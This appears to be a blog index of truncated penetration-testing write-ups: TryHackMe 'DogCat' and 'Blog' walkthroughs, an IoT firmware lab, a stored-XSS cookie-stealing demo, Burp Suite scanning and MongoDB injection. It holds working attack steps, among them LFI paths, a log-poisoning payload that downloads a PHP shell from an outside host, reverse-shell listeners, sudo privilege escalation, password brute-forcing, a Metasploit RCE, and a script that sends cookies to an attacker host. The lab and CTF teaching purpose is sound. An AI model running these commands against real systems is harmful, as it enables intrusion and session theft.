Posts

DogCat

LFI via the PHP filter wrapper:
http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=index
http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=flag
view-source:http://10.10.120.68/?view=../../../../etc/cat/../passwd&ext=
view-source:http://10.10.120.68/?view=../../../../var/log/apache2/cat/../access.log&ext=
https://toolbox.itsec.tamu.edu/
User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.8.135.218/shell.php'))?>
Shell folder:
cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php shell.php
cat shell.php   // Make sure to modify the IP and port inside the shell file
python -m http.server (or 8081)
rlwrap nc -lvnp 8888
find / -type f -name 'flag*' 2>/dev/null   // to find all flags
Inside Shell:
$ cd /var/www/html
whoami
id
ls -la
sudo -l
sudo /usr/bin/env /bin/bash
cd /root
Final Flag:
rlwrap nc -lvnp 8888
cd /opt/
cat backup.sh
tar cf /root/container/backup/backup.tar /root/container
sudo...

Blog Machine - Try Hack Me

Step 1: Gather Information: nmap scan (open ports, versions, FTP, SMB, RDP)
Step 2: Gather Information: Directory Enumeration
gobuster dir -u http://10.10.126.45 -w /usr/share/wordlists/dirb/big.txt -s 200,204,301,302,307,308 --status-codes-blacklist "" -t 20 -o blog.th
Step 3: WPScan
wpscan --url http://blog.thm/ --enumerate p --enumerate t --enumerate u > wpscan_output.txt
cat wpscan_output.txt
Step 4: Brute-force Username & Password
Step 5: Password taken from rockyou.txt
wpscan --url http://blog.thm/ -P /root/Documents/Wordlists/rockyou.txt -U /root/usr.txt --verbose > UserEnumer.txt
Step 6: Metasploit
use exploit/multi/http/wp_crop_rce
set rhosts 10.10.109.33
set username kwheel
set password cutiepie1
set LHOST <My_Machine_IP>
run
shell
python -c 'import pty; pty.spawn("/bin/bash")'
id
Step 7: Inside "Shell" - Walkthrough folder file access
cd /home
ls
cd bjoel
ls
cat user.txt
download /home/bjoel/Billy_Joe...

Lab Setup - IoT - Security Assessment Flow | Educational Purpose

IoT Security Assessment
Step 1: Install the prerequisite tools on your Linux machine:
1. hexdump: a Unix command-line tool that displays the raw byte content of a file in hexadecimal (and optionally ASCII). It is commonly used for analysing binary files, firmware, memory dumps, or for debugging data structures.
2. binwalk + squashfs: Binwalk is a forensic and reverse-engineering tool used primarily for analysing and extracting firmware images. It is widely used in embedded device security testing, firmware analysis, and reverse engineering; squashfs tooling is needed to unpack the extracted SquashFS root filesystems.
3. firmadyne: an automated firmware emulation and dynamic analysis framework that helps security researchers emulate, instrument, and analyse Linux-based firmware images, especially for embedded devices such as routers, IP cameras, and smart home devices.
Step 2: Get the device and extract the firmware file. Let's assume we have a Netgear IoT device, model number WNAP 320, and the extracted firmware.b...

Cookie Stealing via XSS Stored Vulnerability | Educational Purpose Only

Cookie Stealing via XSS Stored Vulnerability
Configuration: sudo nano /etc/hosts
Victim Application:
Step 1: Create and paste the code into an index.html file:
    <!DOCTYPE html>
    <html>
    <head><title>Test</title></head>
    <body>
      <h1>Hello from test.local!</h1>
      <a onclick="document.location='http://attacker.local:8080/steal.php?cookie=' + escape(document.cookie);" href="#">Click me</a>
      <script>
        // Set a test cookie
        document.cookie = "session=ABC123";
      </script>
    </body>
    </html>
Run Command: sudo python3 -m http.server 80
Attacker Code:
    <?php
    if (isset($_GET['cookie'])) {
        file_put_contents("log.txt", $_GET['cookie'] . "\n", FILE_APPEND | LOCK_EX);
        header("Location: http://0.0.0.0/index.html");
        exit();
    }
    ?>
Save as steal.php
Run Command: sudo php -S 0.0.0.0:8080
Finally, we successfully stole t...

Burp Suite – Automated Vulnerabilities Findings

Burp Suite – Automated Vulnerabilities Findings
Step 1: Intercept a request that contains parameter values with Burp Suite.
Step 2: Forward the request to the Intruder tab in Burp Suite.
Step 3: Set up the automated scan by right-clicking, selecting "Scan Defined Insertion Points" and opening the "Scan launcher".
Step 4: Wait until the scan is finished, then review the results for vulnerabilities.
Step 5: Manual Validation

MongoDB Injection Attack

This is a demo exploit for the MongoDB filter option.
Filter Accessories:
Business Logic:
    if(this.category == "Accessories") { // ...do something }
Exploitation:
    if(this.category == 'Accessories' && this.limit == 3)  // Original
    if( this.category == 'Accessories ' || '1' == '1 ' && this.limit == 3 )  // Payload Injected
    { // ...do something }
Capture the request in Burp Suite. Try combinations of special characters to make the request error: "   '   $   {   }   `   ;
Try combinations of Boolean expressions: ' && 1 == 1 ' && '1' == '1 ' || 1 == 1 ' || '1' == '1 ' || 1 || ' || 1 || ' ' || '1' == '1
Note: Make sure to URL-encode the payload before sending it (Ctrl+U in Burp).